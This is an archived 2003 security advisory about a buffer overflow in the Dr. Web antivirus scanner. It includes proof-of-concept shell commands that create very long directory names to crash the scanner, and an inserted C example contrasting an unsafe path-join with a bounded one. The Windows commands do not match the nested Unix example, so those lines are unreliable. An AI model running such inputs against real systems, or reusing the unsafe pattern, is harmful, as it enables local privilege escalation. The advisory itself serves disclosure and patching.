[NT] Buffer Overflow Vulnerability in Dr. Web

From: support@securiteam.com
Date: 03/05/03

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 5 Mar 2003 21:33:34 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    In the US?

    Contact Beyond Security at our new California office
    housewarming rates on automated network vulnerability
    scanning. We also welcome ISPs and other resellers!

    Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
    - - - - - - - - -

      Buffer Overflow Vulnerability in Dr. Web
    ------------------------------------------------------------------------

    SUMMARY

    Dr. WEB <http://www.sald.com> is an antivirus scanner. The new generation
    (DrWeb32) includes programs for Windows 95/98/ME/2000/NT/XP, DOS/386,
    OS/2, Novell NetWare, Linux, FreeBSD 3.xx and 4.xx, and Solaris x86.
    A vulnerability in Dr Web allows a user with access to the server to gain
    root privileges by overflowing a buffer in the program.

    DETAILS

    Vulnerable versions:
     * Dr Web Version 4.28 and below

    Immune versions:
     * Dr Web Version 4.29b and above

    When a user with access to the system creates files with a very long
    name, scanning them overflows a buffer in the scanner and overwrites EIP,
    which gives that user the ability to execute arbitrary code with root
    privileges.

    The program consists of a monitor and a scanner. Only the scanner was
    tested, on version 4.28a, and it was found to be vulnerable.
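    The overflow described above is the classic fixed-buffer path-building bug: a directory walker assembles each entry's path in a stack buffer of fixed size with unbounded string functions. The C code below is an added illustration and is not code from Dr. Web or from the advisory. It shows that vulnerable pattern beside a bounded version that checks the length before writing anything, and runs advisory-style long directory names through the bounded version. SCAN_PATH_MAX, the function names and the constructed 200-character names are assumptions for the example.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed fixed buffer size for a scanner's working path; an example value,
 * not a figure taken from the Dr. Web code. */
#define SCAN_PATH_MAX 256

/* The bug class the advisory describes: the path of each directory entry is
 * assembled in a fixed-size stack buffer with unbounded string functions.
 * A name longer than the remaining room runs past the end of path[], over
 * whatever follows it on the stack (saved registers, return address). This
 * function exists only to show the pattern; nothing in this example calls it.
 */
size_t join_path_unbounded(const char *dir, const char *name)
{
    char path[SCAN_PATH_MAX];
    strcpy(path, dir);      /* no bound on dir */
    strcat(path, "/");
    strcat(path, name);     /* no bound on name: overflow once the total
                               length reaches SCAN_PATH_MAX */
    return strlen(path);
}

/* Hardened form: the length is checked before anything is kept, and an entry
 * that does not fit is reported (errno = ENAMETOOLONG) instead of either
 * overflowing or being silently truncated. Returns 0 on success, -1 on
 * failure; on failure out[] is left as an empty string. */
int join_path_bounded(const char *dir, const char *name,
                      char *out, size_t outlen)
{
    int n;
    if (outlen == 0)
        return -1;          /* not even room for the terminator */
    /* snprintf never writes past outlen, but it returns the length the full
     * string WOULD have had; a result >= outlen means it was truncated. */
    n = snprintf(out, outlen, "%s/%s", dir, name);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';
        errno = ENAMETOOLONG;
        return -1;
    }
    return 0;
}

/* Pre-check a directory walker can run before descending: would `name`
 * under `dir` fit in a SCAN_PATH_MAX byte buffer? Returns 1 if it fits,
 * 0 if it would overflow the unbounded version above. */
int entry_fits(const char *dir, const char *name)
{
    size_t need = strlen(dir) + 1 + strlen(name) + 1; /* dir '/' name NUL */
    return need <= SCAN_PATH_MAX;
}

/* Constructed test input: n copies of c, like the advisory's AAAA... and
 * BBBB... directory names. The caller frees the result. */
char *repeat_char(char c, size_t n)
{
    char *s = malloc(n + 1);
    if (s == NULL)
        return NULL;
    memset(s, c, n);
    s[n] = '\0';
    return s;
}

int main(void)
{
    char first[SCAN_PATH_MAX], second[SCAN_PATH_MAX];
    char *a = repeat_char('A', 200);   /* constructed long names */
    char *b = repeat_char('B', 200);
    if (a == NULL || b == NULL)
        return 1;

    /* "/scan/" + 200 A's + NUL = 207 bytes: fits in 256. */
    if (join_path_bounded("/scan", a, first, sizeof first) == 0)
        printf("first level ok: %zu characters\n", strlen(first));

    /* first + "/" + 200 B's + NUL = 408 bytes: does not fit. The unbounded
     * version would have written 152 bytes past the end of path[]. */
    if (join_path_bounded(first, b, second, sizeof second) != 0)
        printf("second level rejected: %s\n", strerror(errno));

    free(a);
    free(b);
    return 0;
}
```

    Note that switching to snprintf on its own is not the fix: a silently truncated path is a different bug (the scanner would then open the wrong file), so the return value has to be checked and the entry refused or handled with a dynamically sized buffer, as the bounded version does.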

    Exploit:
    Create a folder with a very long name. On a Unix-like system (csh syntax;
    in a Bourne-style shell the assignments would be a=... and b=... without
    the set keyword):

    set a = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    set b = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

    mkdir /$a
    mkdir /$a/$b

    Or, on Windows (cmd.exe; no spaces around the = sign, or the variable name
    would include a trailing space; the \\?\ prefix selects extended-length
    path handling so the name can exceed the usual MAX_PATH limit):

    SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    SET B=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

    mkdir \\?\c:\%A%
    mkdir \\?\c:\%B%

    Use whichever form matches the system.

    When the antivirus scanner tries to scan the folder, it crashes.

    Solution:
    Download the latest version from Dr Web: <http://www.sald.com/get.html>

    ADDITIONAL INFORMATION

    Information was provided by <mailto:conde0@telefonica.net> David
    Fernandez Madrid

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

